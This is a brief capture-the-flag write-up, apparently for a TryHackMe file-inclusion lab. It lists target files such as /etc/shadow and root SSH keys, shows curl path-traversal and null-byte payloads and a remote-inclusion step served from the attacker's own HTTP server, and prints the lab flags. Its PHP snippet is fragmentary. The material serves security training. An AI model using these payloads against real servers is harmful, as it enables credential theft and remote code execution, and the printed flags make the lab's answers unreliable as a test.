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File Inclusion

Interesting files

Location Description
/etc/issue contains a message or system identification to be printed before the login prompt.
/etc/profile controls system-wide default variables, such as Export variables, File creation mask (umask), Terminal types, Mail messages to indicate when new mail has arrived
/proc/version specifies the version of the Linux kernel
/etc/passwd has all registered user that has access to a system
/etc/shadow contains information about the system's users' passwords
/root/.bash_history contains the history commands for root user
/var/log/dmessage contains global system messages, including the messages that are logged during system startup
/var/mail/root all emails for root user
/root/.ssh/id_rsa Private SSH keys for a root or any known valid user on the server
/var/log/apache2/access.log the accessed requests for Apache webserver
C:\boot.ini contains the boot options for computers with BIOS firmware

What function causes path traversal vulnerabilities in PHP?

  • file_get_content

Using functions such as include, require, include_once, and require_once often contribute to vulnerable web applications.

"; echo "". getcwd(). ""; echo "
File Content Preview of "; echo $_GET["file"]; echo "
"; if (substr($_GET['file'], -11, 11) != '/etc/passwd'){ echo file_get_contents($_GET['file']); } else { echo 'You are not allowed to see source files!'."\n"; } echo "
";} ?> 

RFI attack include: - Sensitive Information Disclosure - Cross-site Scripting (XSS) - Denial of Service (DoS)



curl -X POST -d 'file=../../../../etc/flag1'

Flag : F1x3d-iNpu7-f0rrn


Change the THM cookie value to : ../../../../etc/flag2%00

Flag : c00k13_i5_yuMmy1


curl -X POST -d 'file=../../../../etc/flag3%00'

Flag : P0st_1s_w0rk1in9


Create file in attacker machine

echo getenv('HOSTNAME');

Run python3 http server in same folder.

python3 -m http.server

Include the file into RFI vulnerable site.


Flag : lfi-vm-thm-f8c5b1a78692